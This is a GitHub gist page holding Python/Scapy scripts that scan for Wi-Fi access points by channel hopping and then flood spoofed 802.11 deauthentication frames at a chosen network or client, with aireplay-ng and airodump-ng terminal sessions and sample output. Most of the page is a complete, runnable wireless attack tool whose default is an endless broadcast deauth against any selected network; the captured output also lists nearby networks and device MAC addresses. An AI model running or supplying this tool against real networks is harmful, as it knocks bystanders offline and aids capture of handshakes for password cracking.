Skip to content

Instantly share code, notes, and snippets.

@jordan-wright

jordan-wright/add_to_main.py

Last active May 28, 2019 13:48
Show Gist options
  • Star 6 You must be signed in to star a gist
  • Fork 3 You must be signed in to fork a gist
  • Save jordan-wright/4576966 to your computer and use it in GitHub Desktop.
Save jordan-wright/4576966 to your computer and use it in GitHub Desktop.
Download ZIP
Raw
add_to_main.py
# Reset our signal handler
signal.signal(signal.SIGINT, signal.SIG_DFL)
target_bssid = raw_input('Enter a BSSID to perform an deauth attack (q to quit): ')
while target_bssid not in networks:
if target_bssid == 'q' : sys.exit(0)
raw_input('BSSID not detected... Please enter another (q to quit): ')
# Get our interface to the correct channel
print 'Changing ' + args.interface + ' to channel ' + str(networks[target_bssid][1])
os.system("iwconfig %s channel %d" % (args.interface, networks[target_bssid][1]))
# Now we have a bssid that we have detected, let's get the client MAC
target_client = raw_input('Enter a client MAC address (Default: FF:FF:FF:FF:FF:FF): ')
if not target_client: target_client = 'FF:FF:FF:FF:FF:FF'
deauth_pckt_count = raw_input('Number of deauth packets (Default: -1 [constant]): ')
if not deauth_pckt_count: deauth_pckt_count = -1
perform_deauth(target_bssid, target_client, deauth_pckt_count)
Raw
aireplay-ng
root@bt:~# iwconfig wlan0 channel 11
root@bt:~# iwconfig mon0 channel 11
root@bt:~# aireplay-ng --deauth 0 -a 58:6D:8F:3B:96:F8 mon0
23:03:26 Waiting for beacon frame (BSSID: 58:6D:8F:3B:96:F8) on channel 11
NB: this attack is more effective when targeting
a connected wireless client (-c <client's mac>).
23:03:26 Sending DeAuth to broadcast -- BSSID: [58:6D:8F:3B:96:F8]
23:03:27 Sending DeAuth to broadcast -- BSSID: [58:6D:8F:3B:96:F8]
23:03:27 Sending DeAuth to broadcast -- BSSID: [58:6D:8F:3B:96:F8]
23:03:28 Sending DeAuth to broadcast -- BSSID: [58:6D:8F:3B:96:F8]
23:03:28 Sending DeAuth to broadcast -- BSSID: [58:6D:8F:3B:96:F8]
23:03:29 Sending DeAuth to broadcast -- BSSID: [58:6D:8F:3B:96:F8]
^C
Raw
airodump-ng
root@bt:~# airodump-ng mon0
CH 6 ][ Elapsed: 17 mins ][ 2013-01-21 22:49
BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
E4:CE:8F:69:ED:7D -1 0 0 0 113 -1 <length: 0>
28:37:37:47:4B:0A -35 19 0 0 1 54e. WPA2 CCMP PSK Bill Wi the Science Fi
58:6D:8F:3B:96:F8 -9 27 3 0 11 54e WPA2 CCMP PSK raidersec
78:CA:39:41:F9:1F -47 17 0 0 1 54e. WPA2 CCMP PSK <length: 0>
A0:21:B7:7D:02:82 -48 15 2 0 6 54e WPA2 CCMP PSK <length: 6>
00:24:14:10:15:F0 -58 21 0 0 11 54e. WPA2 CCMP PSK <length: 1>
C0:3F:0E:1A:DF:22 -64 8 0 0 6 54e WPA TKIP PSK <length: 6>
68:7F:74:F9:B9:AC -68 1 4 0 6 54e. WPA2 CCMP PSK <length: 0>
00:24:14:11:59:C0 -1 0 2 0 128 -1 WPA <length: 0>
02:05:17:7D:0E:FC -1 9 0 0 11 11 OPN print server 5587C5
E0:F8:47:0C:9F:42 -64 10 1 0 11 54e WPA2 CCMP PSK MILKISGOOD
2C:41:38:43:65:0A -68 2 0 0 6 54e. WPA2 CCMP PSK HP-Print-0A-Photosmart 5520
BSSID STATION PWR Rate Lost Frames Probe
(not associated) 6C:3E:6D:3A:15:79 -63 0 - 1 0 2 4610X WIRELESS PLUS,BakerBrosDeli
(not associated) 00:23:15:33:C2:60 -52 0 - 1 0 13 belkin.308
(not associated) 68:B5:99:35:C2:A3 -60 0 - 1 689 20 2WIRE854
(not associated) 00:20:00:BC:26:D5 -65 0 - 1 0 5
(not associated) 20:AA:4B:E4:F8:85 -66 0 - 1 0 2
(not associated) 2C:27:D7:8A:DD:E1 -67 0 - 1 0 2 NETGEAR04
(not associated) 2C:9E:FC:0E:EC:98 -62 0 - 1 293 13 BJNPSETUP
(not associated) 7C:1E:52:05:D7:78 -68 0 - 1 0 1 MM7MJ
(not associated) 1C:C1:DE:E3:5F:86 -38 0 - 1 245 94 2WIRE629
E4:CE:8F:69:ED:7D 10:40:F3:F1:43:4C -63 0 - 1 4 2
00:24:14:11:59:C0 54:04:A6:35:3E:9C -57 0 - 1e 0 8
02:05:17:7D:0E:FC 00:20:00:55:87:C5 -70 0 - 1 52 9
E0:F8:47:0C:9F:42 00:17:AB:61:81:DD -1 1 - 0 0 1
Raw
create_mon_interface
root@bt:~# ifconfig
<snip loopback>
wlan0 Link encap:Ethernet HWaddr 00:c0:ca:69:a3:8b
UP BROADCAST MULTICAST MTU:1500 Metric:1
RX packets:0 errors:0 dropped:0 overruns:0 frame:0
TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:0 (0.0 B) TX bytes:0 (0.0 B)
root@bt:~# airmon-ng start wlan0
Found 3 processes that could cause trouble.
If airodump-ng, aireplay-ng or airtun-ng stops working after
a short period of time, you may want to kill (some of) them!
PID Name
523 dhclient3
628 dhclient3
1540 dhclient3
Process with PID 1540 (dhclient3) is running on interface wlan0
Interface Chipset Driver
wlan0 Realtek rtl8187 - [phy0]
(monitor mode enabled on mon0)
root@bt:~# ifconfig
<snip loopback>
mon0 Link encap:UNSPEC HWaddr 00-C0-CA-69-A3-8B-30-30-00-00-00-00-00-00-00-00
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:15 errors:0 dropped:0 overruns:0 frame:0
TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:5085 (5.0 KB) TX bytes:0 (0.0 B)
wlan0 Link encap:Ethernet HWaddr 00:c0:ca:69:a3:8b
UP BROADCAST MULTICAST MTU:1500 Metric:1
RX packets:0 errors:0 dropped:0 overruns:0 frame:0
TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:0 (0.0 B) TX bytes:0 (0.0 B)
Raw
final-output
root@bt:/pentest/crux# python sniff-aps.py -i mon0
/usr/lib/pymodules/python2.6/scapy/crypto/cert.py:10: DeprecationWarning: the sha module is deprecated; use the hashlib module instead
import os, sys, math, socket, struct, sha, hmac, string, time
/usr/lib/pymodules/python2.6/scapy/crypto/cert.py:11: DeprecationWarning: The popen2 module is deprecated. Use the subprocess module.
import random, popen2, tempfile
Press CTRL+c to stop sniffing..
====================================================================================================
Channel ESSID BSSID
====================================================================================================
1 Hidden SSID 78:ca:39:41:f9:1f
1 Bill Wi the Science Fi 28:37:37:47:4b:0a
11 Hidden SSID 00:24:14:10:15:f0
11 raidersec 58:6d:8f:3b:96:f8
^CEnter a BSSID to perform an deauth attack (q to quit): 58:6d:8f:3b:96:f8
Changing mon0 to channel 11
Enter a client MAC address (Default: FF:FF:FF:FF:FF:FF):
Number of deauth packets (Default: -1 [constant]):
Sending Deauth to FF:FF:FF:FF:FF:FF from 58:6d:8f:3b:96:f8
.
Sent 1 packets.
.
Sent 1 packets.
.
Sent 1 packets.
.
Sent 1 packets.
.
Sent 1 packets.
<snip>
Raw
perform_deauth.py
def perform_deauth(bssid, client, count):
pckt = Dot11(addr1=client, addr2=bssid, addr3=bssid) / Dot11Deauth()
cli_to_ap_pckt = None
if client != 'FF:FF:FF:FF:FF:FF' : cli_to_ap_pckt = Dot11(addr1=bssid, addr2=client, addr3=bssid) / Dot11Deauth()
print 'Sending Deauth to ' + client + ' from ' + bssid
if not count: print 'Press CTRL+C to quit'
# We will do like aireplay does and send the packets in bursts of 64, then sleep for half a sec or so
while count != 0:
try:
for i in range(64):
# Send out deauth from the AP
send(pckt)
# If we're targeting a client, we will also spoof deauth from the client to the AP
if client != 'FF:FF:FF:FF:FF:FF': send(cli_to_ap_pckt)
# If count was -1, this will be an infinite loop
count -= 1
except KeyboardInterrupt:
break
Raw
sniff-aps-complete.py
import argparse
from multiprocessing import Process
import logging
logging.getLogger("scapy.runtime").setLevel(logging.ERROR)
from scapy.all import *
import signal
import threading
# Using scapy to perform Deauth Attacks
# Author: Jordan (http://raidersec.blogspot.com)
# Credit: Credit for much of the channel hopping and some of the packet extraction (channel extraction) goes to the great work of airoscapy (http://www.thesprawl.org/projects/airoscapy/)
# Also, credit goes to aircrack-ng for being such an awesome set of tools - http://www.aircrack-ng.org/
def add_network(pckt, known_networks):
# Check to see if it's a hidden SSID (this could be resolved later using out Deauth attack)
essid = pckt[Dot11Elt].info if '\x00' not in pckt[Dot11Elt].info and pckt[Dot11Elt].info != '' else 'Hidden SSID'
bssid = pckt[Dot11].addr3
# This insight was included in airoscapy.py (http://www.thesprawl.org/projects/airoscapy/)
channel = int(ord(pckt[Dot11Elt:3].info))
if bssid not in known_networks:
known_networks[bssid] = ( essid, channel )
print "{0:5}\t{1:30}\t{2:30}".format(channel, essid, bssid)
# Channel hopper - This code is very similar to that found in airoscapy.py (http://www.thesprawl.org/projects/airoscapy/)
def channel_hopper(interface):
while True:
try:
channel = random.randrange(1,13)
os.system("iwconfig %s channel %d" % (interface, channel))
time.sleep(1)
except KeyboardInterrupt:
break
def stop_channel_hop(signal, frame):
# set the stop_sniff variable to True to stop the sniffer
global stop_sniff
stop_sniff = True
channel_hop.terminate()
channel_hop.join()
def keep_sniffing(pckt):
return stop_sniff
def perform_deauth(bssid, client, count):
pckt = Dot11(addr1=client, addr2=bssid, addr3=bssid) / Dot11Deauth()
cli_to_ap_pckt = None
if client != 'FF:FF:FF:FF:FF:FF' : cli_to_ap_pckt = Dot11(addr1=bssid, addr2=client, addr3=bssid) / Dot11Deauth()
print 'Sending Deauth to ' + client + ' from ' + bssid
if not count: print 'Press CTRL+C to quit'
# We will do like aireplay does and send the packets in bursts of 64, then sleep for half a sec or so
while count != 0:
try:
for i in range(64):
# Send out deauth from the AP
send(pckt)
# If we're targeting a client, we will also spoof deauth from the client to the AP
if client != 'FF:FF:FF:FF:FF:FF': send(cli_to_ap_pckt)
# If count was -1, this will be an infinite loop
count -= 1
except KeyboardInterrupt:
break
if __name__ == "__main__":
parser = argparse.ArgumentParser(description='aircommand.py - Utilize many wireless security features using the Scapy python module')
parser.add_argument('-i', '--interface', dest='interface', type=str, required=True, help='Interface to use for sniffing and packet injection')
args = parser.parse_args()
conf.iface = args.interface
networks = {}
stop_sniff = False
print 'Press CTRL+c to stop sniffing..'
print '='*100 + '\n{0:5}\t{1:30}\t{2:30}\n'.format('Channel','ESSID','BSSID') + '='*100
channel_hop = Process(target = channel_hopper, args=(args.interface,))
channel_hop.start()
signal.signal(signal.SIGINT, stop_channel_hop)
# Sniff Beacon and Probe Response frames to extract AP info
sniff( lfilter = lambda x: (x.haslayer(Dot11Beacon) or x.haslayer(Dot11ProbeResp)), stop_filter=keep_sniffing, prn=lambda x: add_network(x,networks) )
# Reset our signal handler
signal.signal(signal.SIGINT, signal.SIG_DFL)
target_bssid = raw_input('Enter a BSSID to perform an deauth attack (q to quit): ')
while target_bssid not in networks:
if target_bssid == 'q' : sys.exit(0)
raw_input('BSSID not detected... Please enter another (q to quit): ')
# Get our interface to the correct channel
print 'Changing ' + args.interface + ' to channel ' + str(networks[target_bssid][1])
os.system("iwconfig %s channel %d" % (args.interface, networks[target_bssid][1]))
# Now we have a bssid that we have detected, let's get the client MAC
target_client = raw_input('Enter a client MAC address (Default: FF:FF:FF:FF:FF:FF): ')
if not target_client: target_client = 'FF:FF:FF:FF:FF:FF'
deauth_pckt_count = raw_input('Number of deauth packets (Default: -1 [constant]): ')
if not deauth_pckt_count: deauth_pckt_count = -1
perform_deauth(target_bssid, target_client, deauth_pckt_count)
Raw
sniff-output
root@bt:/pentest/crux# python sniff-aps.py -i mon0
/usr/lib/pymodules/python2.6/scapy/crypto/cert.py:10: DeprecationWarning: the sha module is deprecated; use the hashlib module instead
import os, sys, math, socket, struct, sha, hmac, string, time
/usr/lib/pymodules/python2.6/scapy/crypto/cert.py:11: DeprecationWarning: The popen2 module is deprecated. Use the subprocess module.
import random, popen2, tempfile
Press CTRL+c to stop sniffing..
====================================================================================================
Channel ESSID BSSID
====================================================================================================
6 Hidden SSID a0:21:b7:7d:02:82
11 raidersec 58:6d:8f:3b:96:f8
1 Hidden SSID 78:ca:39:41:f9:1f
1 Bill Wi the Science Fi 28:37:37:47:4b:0a
1 Hidden SSID c8:60:00:95:45:26
1 TTUnet 02:2b:8b:c3:b0:c2
6 Hidden SSID c0:3f:0e:1a:df:22
6 TTUnet 00:24:14:11:2c:c0
6 HP-Print-D6-Deskjet 3520 series a0:b3:cc:d0:28:d6
6 HP-Print-0A-Photosmart 5520 2c:41:38:43:65:0a
6 HP-Print-10-Photosmart 5520 a0:b3:cc:d4:91:10
11 MILKISGOOD e0:f8:47:0c:9f:42
11 print server 5587C5 02:05:17:7d:0e:fc
11 Hidden SSID 00:24:14:10:15:f0
11 TTUnet 00:24:14:11:3b:10
11 Brianâs MacBook Pro b8:8d:12:42:fc:2c
11 TTUnet d8:c7:c8:18:93:30
11 TTUnet 00:24:14:11:8d:20
6 Hidden SSID 68:7f:74:f9:b9:ac
Raw
sniff_aps.py
import argparse
from multiprocessing import Process
import logging
logging.getLogger("scapy.runtime").setLevel(logging.ERROR)
from scapy.all import *
import signal
import threading
def add_network(pckt, known_networks):
# Check to see if it's a hidden SSID (this could be resolved later using out Deauth attack)
essid = pckt[Dot11Elt].info if '\x00' not in pckt[Dot11Elt].info and pckt[Dot11Elt].info != '' else 'Hidden SSID'
bssid = pckt[Dot11].addr3
# This insight was included in airoscapy.py (http://www.thesprawl.org/projects/airoscapy/)
channel = int(ord(pckt[Dot11Elt:3].info))
if bssid not in known_networks:
known_networks[bssid] = ( essid, channel )
print "{0:5}\t{1:30}\t{2:30}".format(channel, essid, bssid)
# Channel hopper - This code is very similar to that found in airoscapy.py (http://www.thesprawl.org/projects/airoscapy/)
def channel_hopper(interface):
while True:
try:
channel = random.randrange(1,13)
os.system("iwconfig %s channel %d" % (interface, channel))
time.sleep(1)
except KeyboardInterrupt:
break
def stop_channel_hop(signal, frame):
# set the stop_sniff variable to True to stop the sniffer
global stop_sniff
stop_sniff = True
channel_hop.terminate()
channel_hop.join()
def keep_sniffing(pckt):
return stop_sniff
if __name__ == "__main__":
parser = argparse.ArgumentParser(description='aircommand.py - Utilize many wireless security features using the Scapy python module')
parser.add_argument('-i', '--interface', dest='interface', type=str, required=True, help='Interface to use for sniffing and packet injection')
args = parser.parse_args()
networks = {}
stop_sniff = False
print 'Press CTRL+c to stop sniffing..'
print '='*100 + '\n{0:5}\t{1:30}\t{2:30}\n'.format('Channel','ESSID','BSSID') + '='*100
channel_hop = Process(target = channel_hopper, args=(args.interface,))
channel_hop.start()
signal.signal(signal.SIGINT, stop_channel_hop)
# Sniff Beacon and Probe Response frames to extract AP info
sniff( lfilter = lambda x: (x.haslayer(Dot11Beacon) or x.haslayer(Dot11ProbeResp)), stop_filter=keep_sniffing, prn=lambda x: add_network(x,networks) )
@skiffer
Copy link

skiffer commented Feb 2, 2014

fine

@praslnx8
Copy link

where is main.py

@RIMEH1
Copy link

RIMEH1 commented Mar 31, 2015

I want to khnow how can I turn your prog and if i can deconnect a particular device of my network.
thanks.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment